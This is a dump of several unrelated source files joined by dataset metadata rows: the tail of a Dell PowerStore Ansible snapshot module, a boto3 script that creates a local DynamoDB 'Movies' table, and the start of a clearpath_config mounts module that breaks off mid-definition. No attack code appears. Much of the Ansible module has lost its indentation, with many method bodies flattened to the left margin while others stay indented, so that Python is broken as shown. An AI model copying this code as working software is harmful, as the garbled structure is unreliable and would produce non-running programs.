- The description for the snapshot.
state:
description:
- Defines whether the Snapshot should exist or not.
required: true
choices: [absent, present]
'''
EXAMPLES = r'''
- name: Create a volume snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
description: "{{description}}"
desired_retention: "{{desired_retention}}"
retention_unit: "{{retention_unit_days}}"
state: "{{state_present}}"
- name: Get details of a volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Rename volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Delete volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_absent}}"
- name: Create a volume group snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp}}"
state: "{{state_present}}"
- name: Get details of a volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Modify volume group snapshot expiration timestamp
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp_new}}"
state: "{{state_present}}"
- name: Rename volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Delete volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_absent}}"
'''
RETURN = r'''
'''
# Module-level logger shared by all snapshot operations below.
LOG = utils.get_logger('dellemc_powerstore_snapshot',
                       log_devel=logging.INFO)
# Probe for the PyU4PS SDK and its version once at import time; the
# results are enforced (via fail_json) in PowerStoreSnapshot.__init__.
py4ps_sdk = utils.has_pyu4ps_sdk()
HAS_PY4PS = py4ps_sdk['HAS_Py4PS']
IMPORT_ERROR = py4ps_sdk['Error_message']
py4ps_version = utils.py4ps_version_check()
IS_SUPPORTED_PY4PS_VERSION = py4ps_version['supported_version']
VERSION_ERROR = py4ps_version['unsupported_version_message']
# Application type reported to the PowerStore REST API.
APPLICATION_TYPE = 'Ansible/1.0'
class PowerStoreSnapshot(object):
"""Class with Snapshot operations"""
    def __init__(self):
        """Build the AnsibleModule and connect to the PowerStore array.

        Merges the shared PowerStore host parameters with this module's
        snapshot-specific argument spec, enforces parameter exclusions,
        validates the Py4PS SDK, and caches the protection and
        provisioning clients used by every other method.
        """
        self.module_params = utils.get_powerstore_management_host_parameters()
        self.module_params.update(
            get_powerstore_snapshot_parameters())
        # A snapshot targets either a volume or a volume group, is named
        # by either name or id, and its expiry comes from either a
        # retention value or an explicit timestamp -- never both.
        mutually_exclusive = [
            ['volume', 'volume_group'], ['snapshot_name', 'snapshot_id'],
            ['desired_retention', 'expiration_timestamp']
        ]
        required_one_of = [
            ['snapshot_name', 'snapshot_id'], ['volume', 'volume_group']
        ]
        # Initialize the Ansible module
        self.module = AnsibleModule(
            argument_spec=self.module_params,
            supports_check_mode=True,
            mutually_exclusive=mutually_exclusive,
            required_one_of=required_one_of
        )
        LOG.info(
            'HAS_PY4PS = {0} , IMPORT_ERROR = {1}'.format(
                HAS_PY4PS, IMPORT_ERROR))
        # Abort early when the Py4PS SDK is missing or unsupported.
        if HAS_PY4PS is False:
            self.module.fail_json(msg=IMPORT_ERROR)
        LOG.info(
            'IS_SUPPORTED_PY4PS_VERSION = {0} , VERSION_ERROR = {1}'.format(
                IS_SUPPORTED_PY4PS_VERSION,
                VERSION_ERROR))
        if IS_SUPPORTED_PY4PS_VERSION is False:
            self.module.fail_json(msg=VERSION_ERROR)
        # Cache the REST clients used by all snapshot operations.
        self.py4ps_conn = utils.get_powerstore_connection(self.module.params,
                                                          application_type=APPLICATION_TYPE)
        self.protection = self.py4ps_conn.protection
        self.provisioning = self.py4ps_conn.provisioning
        LOG.info('Got Py4ps instance for PowerStore')
def get_vol_snap_details(self, snapshot):
"""Returns details of a Volume Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_snapshot_details(snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"Volume snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_group_snap_details(self, snapshot):
"""Returns details of a Volume Group Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_group_snapshot_details(
snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"VG snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_snapshot(self, volume_id, snapshot_name, snapshot_id):
"""Get the volume snapshot"""
try:
vol_snaps = self.protection.get_volume_snapshots(volume_id)
snapshot = None
for snap in vol_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume: {0} with error {1}".format(volume_id,
str(e)))
def get_vol_group_snapshot(self, vg_id, snapshot_name, snapshot_id):
"""Get Volume Group Snapshot"""
try:
vg_snaps = self.protection.get_volume_group_snapshots(vg_id)
snapshot = None
for snap in vg_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume group: {0} with error {1}".format(
vg_id, str(e)))
def get_vol_id_from_volume(self, volume):
"""Maps the volume to volume ID"""
is_valid_uuid = self.is_valid_uuid(volume)
if is_valid_uuid:
try:
vol = self.provisioning.get_volume_details(volume)
return vol['id']
except Exception as e:
LOG.info("No volume found by ID: {0}, "
"looking it up by name. Error: {1}".format(volume,
str(e)))
pass
try:
vol = \
self.provisioning.get_volume_by_name(volume)
if vol:
return vol[0]['id']
else:
self.module.fail_json(
msg="Volume {0} was not found on "
"the array.".format(volume))
except Exception as e:
self.module.fail_json(msg="Failed to get vol {0} by "
"name with error "
"{1}".format(volume, str(e)))
def get_vol_group_id_from_vg(self, volume_group):
"""Maps the volume group to Volume Group ID"""
is_valid_uuid = self.is_valid_uuid(volume_group)
if is_valid_uuid:
try:
vg = self.provisioning.get_volume_group_details(
volume_group_id=volume_group)
return vg['id']
except Exception as e:
LOG.info("No volume group found by ID: {0}, "
"looking it up by name. Error {1}".format(
volume_group, str(e)))
pass
try:
vg = \
self.provisioning.get_volume_group_by_name(volume_group)
if vg:
return vg[0]['id']
else:
self.module.fail_json(
msg="Volume Group {0} was not found on "
"the array.".format(volume_group))
except Exception as e:
self.module.fail_json(msg="Failed to get volume group: "
"{0} by name with error: "
"{1}".format(volume_group, str(e)))
def create_vol_snapshot(self, snapshot_name,
description,
volume_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a volume on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
snapshot = self.get_vol_snapshot(volume_id, snapshot_name, None)
if snapshot is not None:
LOG.error("Snapshot: {0} already exists".format(snapshot_name))
return False
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(desired_retention))
).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_snapshot(
name=snapshot_name,
description=description,
volume_id=volume_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'volume {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume'],
str(e)))
self.module.fail_json(msg=error_message.format(snapshot_name,
self.module.params[
'volume'],
str(e)))
def create_vg_snapshot(self, snapshot_name,
description,
vg_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a VG on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(
desired_retention))).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_group_snapshot(
name=snapshot_name,
description=description,
volume_group_id=vg_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'VG {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume_group'],
str(e)))
self.module.fail_json(msg=error_message.format(
snapshot_name,
self.module.params['volume_group'],
str(e)))
def delete_vol_snapshot(self, snapshot):
"""Deletes a Vol snapshot on PowerStore"""
try:
self.protection.delete_volume_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def delete_vol_group_snapshot(self, snapshot):
"""Deletes a Vol group snapshot on PowerStore"""
try:
self.protection.delete_volume_group_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_snapshot(self, snapshot, new_name):
"""Renames a vol snapshot"""
# Check if new name is same is present name
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to rename snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_group_snapshot(self, snapshot, new_name):
"""Renames a vol group snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
    def check_snapshot_modified(self, snapshot, volume, volume_group,
                                description, desired_retention,
                                retention_unit, expiration_timestamp):
        """Determines whether the snapshot has been modified.

        Compares the snapshot's current description and expiration
        timestamp against the requested values and returns
        (modified, details) where *details* records which fields need
        updating and their new values. Retention is converted into an
        absolute expiry relative to the snapshot's creation time.
        Timestamp comparison ignores seconds and tolerates a two-minute
        delta to absorb request latency.
        """
        LOG.info("Determining if the snap has been modified...")
        snapshot_modification_details = dict()
        snapshot_modification_details['is_description_modified'] = False
        snapshot_modification_details['new_description_value'] = None
        snapshot_modification_details['is_timestamp_modified'] = False
        snapshot_modification_details['new_expiration_timestamp_value'] = None
        # With neither retention nor an explicit expiry requested there
        # is nothing to compare against -- report "not modified".
        if desired_retention is None and expiration_timestamp is None:
            LOG.info("desired_retention and expiration_time are both "
                     "not provided, we don't check for snapshot modification "
                     "in this case. The snapshot details would be returned, "
                     "if available.")
            return False, snapshot_modification_details
        snap_details = None
        if volume is not None:
            snap_details = self.get_vol_snap_details(snapshot)
        elif volume_group is not None:
            snap_details = self.get_vol_group_snap_details(snapshot)
        LOG.debug("The snap details are: {0}".format(snap_details))
        snap_creation_timestamp = None
        if 'creation_timestamp' in snap_details:
            # Only taking into account YYYY-MM-DDTHH-MM, ignoring
            # seconds component.
            snap_creation_timestamp = \
                snap_details['creation_timestamp'][0:16] + 'Z'
        # Convert the requested retention into an absolute expiry,
        # anchored at the snapshot's creation time (unit defaults to
        # hours); 'None' explicitly clears the expiry.
        if desired_retention is not None and desired_retention != 'None':
            if retention_unit is None:
                expiration_timestamp = (datetime.strptime(
                    snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') +
                                        timedelta(
                                            hours=int(desired_retention))
                                        ).isoformat() \
                                        + 'Z'
            elif retention_unit == 'days':
                expiration_timestamp = (datetime.strptime(
                    snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
                    days=int(desired_retention))).isoformat() + 'Z'
            elif retention_unit == 'hours':
                expiration_timestamp = (datetime.strptime(
                    snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
                    hours=int(desired_retention))).isoformat() + 'Z'
        elif desired_retention == 'None':
            expiration_timestamp = None
        LOG.info("The new expiration timestamp is {0}".format(
            expiration_timestamp))
        modified = False
        # Case 1: both sides carry an expiry -- compare them, tolerating
        # a delta of up to two minutes.
        if 'expiration_timestamp' in snap_details['protection_data'] \
                and snap_details['protection_data']['expiration_timestamp'] \
                is not None and expiration_timestamp is not None:
            # Only taking into account YYYY-MM-DDTHH-MM, ignoring
            # seconds component.
            if snap_details['protection_data']['expiration_timestamp'][0:16] \
                    != expiration_timestamp[0:16]:
                # We can tolerate a delta of two minutes.
                existing_timestamp = \
                    snap_details['protection_data']['expiration_timestamp'][
                        0:16] + 'Z'
                new_timestamp = expiration_timestamp[0:16] + 'Z'
                existing_time_obj = datetime.strptime(existing_timestamp,
                                                      '%Y-%m-%dT%H:%MZ')
                new_time_obj = datetime.strptime(new_timestamp,
                                                 '%Y-%m-%dT%H:%MZ')
                if existing_time_obj > new_time_obj:
                    td = existing_time_obj - new_time_obj
                else:
                    td = new_time_obj - existing_time_obj
                td_mins = int(round(td.total_seconds() / 60))
                if td_mins > 2:
                    snapshot_modification_details[
                        'is_timestamp_modified'] = True
                    snapshot_modification_details[
                        'new_expiration_timestamp_value'] = \
                        expiration_timestamp
                    modified = True
        # Case 2: snapshot has no expiry field but one was requested.
        elif 'expiration_timestamp' not in snap_details['protection_data'] \
                and expiration_timestamp is not None:
            snapshot_modification_details['is_timestamp_modified'] = True
            snapshot_modification_details[
                'new_expiration_timestamp_value'] = expiration_timestamp
            modified = True
        # Case 3: expiry field present but the request clears it.
        elif 'expiration_timestamp' in snap_details['protection_data'] \
                and expiration_timestamp is None:
            if snap_details['protection_data'][
                    'expiration_timestamp'] is not None:
                snapshot_modification_details['is_timestamp_modified'] = True
                snapshot_modification_details[
                    'new_expiration_timestamp_value'] = expiration_timestamp
                modified = True
        # Case 4: expiry field present but currently None, and an expiry
        # was requested.
        elif 'expiration_timestamp' in snap_details['protection_data'] and \
                snap_details['protection_data']['expiration_timestamp'] is \
                None and expiration_timestamp is not None:
            snapshot_modification_details['is_timestamp_modified'] = True
            snapshot_modification_details[
                'new_expiration_timestamp_value'] = expiration_timestamp
            modified = True
        # Description change is checked independently of the expiry.
        if 'description' in snap_details and description is not None:
            if snap_details['description'] != description:
                snapshot_modification_details['is_description_modified'] = \
                    True
                snapshot_modification_details['new_description_value'] \
                    = description
                modified = True
        LOG.info("Snapshot modified {0}, modification details: {1}"
                 .format(modified, snapshot_modification_details))
        return modified, snapshot_modification_details
def modify_vol_snapshot(self, snapshot,
snapshot_modification_details):
"""Modify a volume snapshot"""
try:
changed = False
if snapshot_modification_details['is_description_modified']:
new_description = \
snapshot_modification_details['new_description_value']
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
description=new_description)
changed = True
if snapshot_modification_details['is_timestamp_modified']:
new_timestamp = \
snapshot_modification_details[
'new_expiration_timestamp_value']
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
expiration_timestamp=new_timestamp)
changed = True
if changed:
resp = self.get_vol_snap_details(
snapshot)
return changed, resp
else:
return changed, None
except Exception as e:
error_message = 'Failed to modify snapshot {0} with error {1}'
LOG.info(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(
msg=error_message.format(snapshot['name'], str(e)))
def modify_vol_group_snapshot(self, snapshot,
snapshot_modification_details):
"""Modify a volume group snapshot"""
try:
changed = False
if snapshot_modification_details['is_description_modified']:
new_description = \
snapshot_modification_details['new_description_value']
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
description=new_description)
changed = True
if snapshot_modification_details['is_timestamp_modified']:
new_timestamp = \
snapshot_modification_details[
'new_expiration_timestamp_value']
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
expiration_timestamp=new_timestamp)
changed = True
if changed:
resp = self.get_vol_group_snap_details(
snapshot)
return changed, resp
else:
return changed, None
except Exception as e:
error_message = 'Failed to modify snapshot {0} with error {1}'
LOG.info(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def is_valid_uuid(self, val):
"""Determines if the string is a valid UUID"""
try:
UUID(str(val))
return True
except ValueError:
return False
def validate_expiration_timestamp(self, expiration_timestamp):
"""Validates whether the expiration timestamp is valid"""
try:
datetime.strptime(expiration_timestamp,
'%Y-%m-%dT%H:%M:%SZ')
except ValueError:
self.module.fail_json(msg='Incorrect date format, '
'should be YYYY-MM-DDTHH:MM:SSZ')
def validate_desired_retention(self, desired_retention):
"""Validates the specified desired retention"""
try:
int(desired_retention)
except ValueError:
if desired_retention == 'None':
LOG.info("Desired retention is set to 'None'")
else:
self.module.fail_json(msg="Please provide a valid integer"
" as the desired retention.")
    def perform_module_operation(self):
        """
        Perform different actions on VG or volume Snapshot based on user
        parameter chosen in playbook.

        Dispatch order: validate inputs, resolve the volume / volume
        group and the target snapshot, then run create / delete / rename
        / modify / get branches and exit the module with the aggregated
        result dict.
        """
        volume = self.module.params['volume']
        volume_group = self.module.params['volume_group']
        snapshot_name = self.module.params['snapshot_name']
        snapshot_id = self.module.params['snapshot_id']
        new_snapshot_name = self.module.params['new_snapshot_name']
        desired_retention = self.module.params['desired_retention']
        retention_unit = self.module.params['retention_unit']
        expiration_timestamp = self.module.params['expiration_timestamp']
        description = self.module.params['description']
        state = self.module.params['state']
        # Result skeleton returned to Ansible; the per-operation flags
        # below are collapsed into 'changed' at the end.
        result = dict(
            changed=False,
            create_vg_snap='',
            delete_vg_snap='',
            modify_vg_snap='',
            create_vol_snap='',
            delete_vol_snap='',
            modify_vol_snap='',
            snap_details='',
        )
        snapshot = None
        volume_id = None
        volume_group_id = None
        # Input validation (each call fails the module on bad data).
        if expiration_timestamp is not None:
            self.validate_expiration_timestamp(expiration_timestamp)
        if desired_retention is not None:
            self.validate_desired_retention(desired_retention)
        # Resolve the target object, then look up the snapshot on it.
        if volume is not None:
            volume_id = self.get_vol_id_from_volume(volume)
        elif volume_group is not None:
            volume_group_id = self.get_vol_group_id_from_vg(volume_group)
        if volume is not None:
            snapshot = self.get_vol_snapshot(volume_id, snapshot_name,
                                             snapshot_id)
        elif volume_group is not None:
            snapshot = self.get_vol_group_snapshot(volume_group_id,
                                                   snapshot_name,
                                                   snapshot_id)
        # Work out whether description/expiry need updating.
        is_snap_modified = False
        snapshot_modification_details = dict()
        if snapshot is not None:
            is_snap_modified, snapshot_modification_details = \
                self.check_snapshot_modified(snapshot,
                                             volume,
                                             volume_group,
                                             description,
                                             desired_retention,
                                             retention_unit,
                                             expiration_timestamp)
        # Create / delete for volume snapshots.
        if state == 'present' and volume and not snapshot:
            LOG.info("Creating new snapshot: {0} for volume: {1}".format(
                snapshot_name, volume))
            result['create_vol_snap'], result['snap_details'] = \
                self.create_vol_snapshot(snapshot_name,
                                         description,
                                         volume_id,
                                         desired_retention,
                                         retention_unit,
                                         expiration_timestamp,
                                         new_snapshot_name)
        elif state == 'absent' and (snapshot_name or snapshot_id) and \
                volume and snapshot:
            LOG.info("Deleting snapshot {0} for Volume {1}".format(
                snapshot['name'], volume))
            result['delete_vol_snap'] = \
                self.delete_vol_snapshot(snapshot)
        # Create / delete for volume-group snapshots.
        if state == 'present' and volume_group and not snapshot:
            LOG.info("Creating new snapshot: {0} for VG: {1}".format(
                snapshot_name, volume_group))
            result['create_vg_snap'], result['snap_details'] = \
                self.create_vg_snapshot(snapshot_name,
                                        description,
                                        volume_group_id,
                                        desired_retention,
                                        retention_unit,
                                        expiration_timestamp,
                                        new_snapshot_name)
        elif state == 'absent' and (
                snapshot_name or snapshot_id) and volume_group \
                and snapshot:
            LOG.info("Deleting snapshot {0} for VG {1}".format(
                snapshot['name'], volume_group))
            result['delete_vg_snap'] = \
                self.delete_vol_group_snapshot(snapshot)
        # Rename branches.
        # NOTE(review): 'snapshot' may still be None here (e.g. a
        # create with new_snapshot_name fails earlier, but a lookup miss
        # combined with new_snapshot_name would hit snapshot['name'] on
        # None) -- confirm guards upstream before relying on this path.
        if state == 'present' and volume and new_snapshot_name:
            LOG.info("Renaming snapshot {0} to new name {1}".format(
                snapshot['name'], new_snapshot_name))
            result['modify_vol_snap'] = self.rename_vol_snapshot(
                snapshot, new_snapshot_name)
        elif state == 'present' and volume_group \
                and new_snapshot_name:
            LOG.info("Renaming snapshot {0} to new name {1}".format(
                snapshot['name'], new_snapshot_name))
            result['modify_vg_snap'] = self.rename_vol_group_snapshot(
                snapshot, new_snapshot_name)
        # Modify branches (description and/or expiration timestamp).
        # NOTE(review): the trailing 'or result[...]' below can never
        # trigger -- modify_* always returns a 2-tuple, which is truthy
        # even when it is (False, None); this looks like dead code.
        if state == 'present' and snapshot and volume and is_snap_modified:
            LOG.info("Modifying snapshot {0}".format(snapshot['name']))
            result['modify_vol_snap'], result['snap_details'] = \
                self.modify_vol_snapshot(snapshot,
                                         snapshot_modification_details) or \
                result['modify_vol_snap']
        elif state == 'present' and snapshot and volume_group \
                and is_snap_modified:
            LOG.info("Modifying snapshot {0}".format(snapshot['name']))
            result['modify_vg_snap'], result['snap_details'] = \
                self.modify_vol_group_snapshot(
                    snapshot,
                    snapshot_modification_details) or \
                result['modify_vg_snap']
        # Pure "get details" path: present state with no retention or
        # expiry requested.
        if state == 'present' and (snapshot_name or snapshot_id) and volume \
                and not desired_retention \
                and not expiration_timestamp:
            result['snap_details'] = self.get_vol_snap_details(snapshot)
        elif state == 'present' and (snapshot_name or snapshot_id) \
                and volume_group and not desired_retention \
                and not expiration_timestamp:
            result['snap_details'] = self.get_vol_group_snap_details(
                snapshot)
        # Collapse the per-operation flags into the overall changed flag.
        if result['create_vol_snap'] or result['delete_vol_snap'] or result[
            'modify_vol_snap'] or result['create_vg_snap'] \
                or result['delete_vg_snap'] or result['modify_vg_snap']:
            result['changed'] = True
        # Finally update the module result!
        self.module.exit_json(**result)
def get_powerstore_snapshot_parameters():
    """Return the Ansible argument spec accepted by the snapshot module.

    All parameters are optional strings except 'state', which is required
    and restricted to 'present'/'absent'.
    """
    spec = {
        'volume_group': dict(required=False, type='str'),
        'volume': dict(required=False, type='str'),
        'snapshot_name': dict(required=False, type='str'),
        'snapshot_id': dict(required=False, type='str'),
        'new_snapshot_name': dict(required=False, type='str'),
        'desired_retention': dict(required=False, type='str'),
        'retention_unit': dict(required=False, choices=['hours', 'days'],
                               type='str'),
        'expiration_timestamp': dict(required=False, type='str'),
        'description': dict(required=False, type='str'),
        'state': dict(required=True, choices=['present', 'absent'],
                      type='str'),
    }
    return spec
def main():
    """Create PowerStore Snapshot object and perform action on it
    based on user input from playbook"""
    snapshot_module = PowerStoreSnapshot()
    snapshot_module.perform_module_operation()
# Entry point when the module file is executed directly by Ansible.
if __name__ == '__main__':
    main()
| avs6/ansible-powerstore | dellemc_ansible/powerstore/library/dellemc_powerstore_snapshot.py | dellemc_powerstore_snapshot.py | py | 39,907 | python | en | code | 0 | github-code | 36 |
35864084249 | from __future__ import print_function
import boto3
#This module creates a table with the table constraints as well
# Connect to a local DynamoDB endpoint.
# NOTE(review): the 'Secret' access keys are placeholders required by boto3
# for a local endpoint -- never commit real AWS credentials in source.
dynamodb = boto3.resource('dynamodb', region_name='us-west-2', endpoint_url='http://localhost:8000', aws_access_key_id='Secret', aws_secret_access_key='Secret')

# Create the Movies table with a composite primary key:
# 'year' (partition key, numeric) + 'title' (sort key, string).
table = dynamodb.create_table(
    TableName = 'Movies',
    KeySchema=[
        {
            'AttributeName': 'year',
            'KeyType': 'HASH' #Partition key
        },
        {
            'AttributeName': 'title',
            'KeyType': 'RANGE' #Sort key
        }
    ],
    # Only key attributes need declared types; other attributes are schemaless.
    AttributeDefinitions=[
        {
            'AttributeName': 'year',
            'AttributeType': 'N'
        },
        {
            'AttributeName': 'title',
            'AttributeType': 'S'
        },
    ],
    # Provisioned capacity: 10 read units / 10 write units.
    ProvisionedThroughput={
        'ReadCapacityUnits': 10,
        'WriteCapacityUnits': 10
    }
)
15672387350 | from clearpath_config.common.types.config import BaseConfig
from clearpath_config.common.types.list import OrderedListConfig
from clearpath_config.common.utils.dictionary import flip_dict
from clearpath_config.mounts.types.fath_pivot import FathPivot
from clearpath_config.mounts.types.flir_ptu import FlirPTU
from clearpath_config.mounts.types.mount import BaseMount
from clearpath_config.mounts.types.pacs import PACS
from clearpath_config.mounts.types.post import Post
from clearpath_config.mounts.types.sick import SICKStand
from clearpath_config.mounts.types.disk import Disk
from typing import List
class Mount():
    """Factory that maps a mount model name to its concrete mount class.

    Calling ``Mount(model)`` returns a new instance of the registered class
    (not a ``Mount`` instance), via ``__new__``.
    """
    # Model-name constants re-exported from the concrete mount classes.
    FATH_PIVOT = FathPivot.MOUNT_MODEL
    FLIR_PTU = FlirPTU.MOUNT_MODEL
    PACS_RISER = PACS.Riser.MOUNT_MODEL
    PACS_BRACKET = PACS.Bracket.MOUNT_MODEL
    # Registry: model name -> mount class.
    MODEL = {
        FATH_PIVOT: FathPivot,
        FLIR_PTU: FlirPTU,
        PACS_RISER: PACS.Riser,
        PACS_BRACKET: PACS.Bracket
    }

    def __new__(cls, model: str) -> BaseMount:
        """Instantiate the mount class registered under *model*.

        Raises AssertionError when *model* is not a known mount model.
        """
        assert model in Mount.MODEL, (
            "Model '%s' must be one of: '%s'" % (
                model,
                Mount.MODEL.keys()
            )
        )
        return Mount.MODEL[model]()
class MountListConfig(OrderedListConfig[BaseMount]):
    """Ordered collection of mounts, serializable to a list of dicts."""

    def __init__(self) -> None:
        super().__init__(obj_type=BaseMount)

    def to_dict(self) -> List[dict]:
        """Serialize every contained mount, preserving order."""
        return [mount.to_dict() for mount in self.get_all()]
class MountsConfig(BaseConfig):
    """Configuration section describing every mount attached to the robot.

    Each supported mount type (bracket, fath pivot, riser, SICK stand, post,
    disk) is stored as a MountListConfig; property getters refresh the
    serialized config dictionary before returning the list.
    """
    MOUNTS = "mounts"
    # Config keys re-exported from the concrete mount classes.
    BRACKET = PACS.Bracket.MOUNT_MODEL
    FATH_PIVOT = FathPivot.MOUNT_MODEL
    RISER = PACS.Riser.MOUNT_MODEL
    SICK = SICKStand.MOUNT_MODEL
    POST = Post.MOUNT_MODEL
    DISK = Disk.MOUNT_MODEL

    TEMPLATE = {
        MOUNTS: {
            BRACKET: BRACKET,
            FATH_PIVOT: FATH_PIVOT,
            RISER: RISER,
            SICK: SICK,
            POST: POST,
            DISK: DISK,
        }
    }

    KEYS = flip_dict(TEMPLATE)

    DEFAULTS = {
        BRACKET: [],
        FATH_PIVOT: [],
        RISER: [],
        SICK: [],
        POST: [],
        DISK: [],
    }

    def __init__(
            self,
            config: dict = {},
            bracket: List[PACS.Bracket] = DEFAULTS[BRACKET],
            fath_pivot: List[FathPivot] = DEFAULTS[FATH_PIVOT],
